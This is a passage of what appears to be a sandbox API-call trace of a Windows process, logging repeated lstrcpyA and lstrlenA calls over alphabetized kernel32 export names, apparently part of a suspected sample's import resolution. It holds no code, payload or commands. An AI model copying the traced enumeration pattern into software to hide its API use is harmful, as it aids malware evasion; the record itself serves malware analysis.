(in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0182.054] lstrlenA (lpString="CHECKELEVATION") returned 14 [0182.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0182.054] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0182.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0182.054] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0182.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0182.054] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0182.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0182.054] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0182.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0182.054] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0182.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0182.054] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0182.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0182.054] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0182.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0182.054] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0182.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0182.054] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0182.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0182.054] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0182.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0182.054] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0182.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0182.054] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0182.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0182.054] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0182.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0182.054] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0182.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0182.054] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0182.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0182.054] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0182.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0182.054] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0182.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0182.055] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0182.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0182.055] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0182.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0182.055] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0182.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0182.055] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0182.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0182.055] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0182.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0182.055] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0182.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0182.055] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0182.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0182.055] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0182.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0182.055] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0182.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0182.055] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0182.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0182.055] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0182.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0182.055] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0182.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0182.055] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0182.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0182.055] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0182.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0182.055] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0182.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0182.055] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0182.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0182.055] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0182.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0182.056] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0182.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0182.056] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0182.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0182.056] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0182.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0182.056] lstrlenA (lpString="COPYCONTEXT") returned 11 [0182.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0182.056] lstrlenA (lpString="COPYFILEA") returned 9 [0182.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0182.056] lstrlenA (lpString="COPYFILEEXA") returned 11 [0182.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0182.056] lstrlenA (lpString="COPYFILEEXW") returned 11 [0182.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0182.056] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0182.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0182.056] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0182.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0182.056] lstrlenA (lpString="COPYFILEW") returned 9 [0182.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0182.056] lstrlenA (lpString="COPYLZFILE") returned 10 [0182.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0182.056] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0182.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0182.056] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0182.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0182.056] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0182.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0182.056] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0182.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0182.056] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0182.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0182.056] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0182.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0182.057] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0182.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0182.057] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0182.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0182.057] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0182.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0182.057] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0182.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0182.057] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0182.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0182.057] lstrlenA (lpString="CREATEEVENTA") returned 12 [0182.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0182.057] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0182.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0182.057] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0182.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0182.057] lstrlenA (lpString="CREATEEVENTW") returned 12 [0182.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0182.057] lstrlenA (lpString="CREATEFIBER") returned 11 [0182.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0182.057] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0182.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0182.057] lstrlenA (lpString="CREATEFILEA") returned 11 [0182.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0182.057] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0182.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0182.057] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0182.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0182.057] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0182.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0182.057] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0182.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0182.057] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0182.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0182.057] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0182.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0182.058] lstrlenA (lpString="CREATEFILEW") returned 11 [0182.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0182.058] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0182.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0182.058] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0182.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0182.058] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0182.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0182.058] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0182.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0182.058] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0182.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0182.058] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0182.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0182.058] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0182.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0182.058] lstrlenA (lpString="CREATEJOBSET") returned 12 [0182.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0182.058] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0182.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0182.058] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0182.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0182.058] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0182.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0182.058] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0182.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0182.058] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0182.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0182.058] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0182.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0182.058] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0182.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0182.059] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0182.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0182.059] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0182.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0182.059] lstrlenA (lpString="CREATEPIPE") returned 10 [0182.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0182.059] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0182.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0182.059] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0182.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0182.059] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0182.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0182.059] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0182.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0182.059] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0182.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0182.059] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0182.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0182.059] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0182.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0182.059] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0182.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0182.059] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0182.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0182.059] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0182.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0182.059] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0182.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0182.059] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0182.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0182.059] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0182.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0182.059] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0182.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0182.059] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0182.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0182.060] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0182.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0182.060] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0182.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0182.060] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0182.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0182.060] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0182.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0182.060] lstrlenA (lpString="CREATETHREAD") returned 12 [0182.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0182.060] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0182.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0182.060] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0182.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0182.060] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0182.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0182.060] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0182.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0182.060] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0182.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0182.060] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0182.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0182.060] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0182.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0182.060] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0182.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0182.060] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0182.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0182.060] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0182.066] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0182.066] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0182.066] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0182.066] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0182.066] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0182.066] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0182.066] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0182.066] lstrlenA (lpString="CTRLROUTINE") returned 11 [0182.066] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0182.066] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0182.066] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0182.067] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0182.067] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0182.067] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0182.067] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0182.067] lstrlenA (lpString="DEBUGBREAK") returned 10 [0182.067] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0182.067] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0182.067] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0182.067] lstrlenA 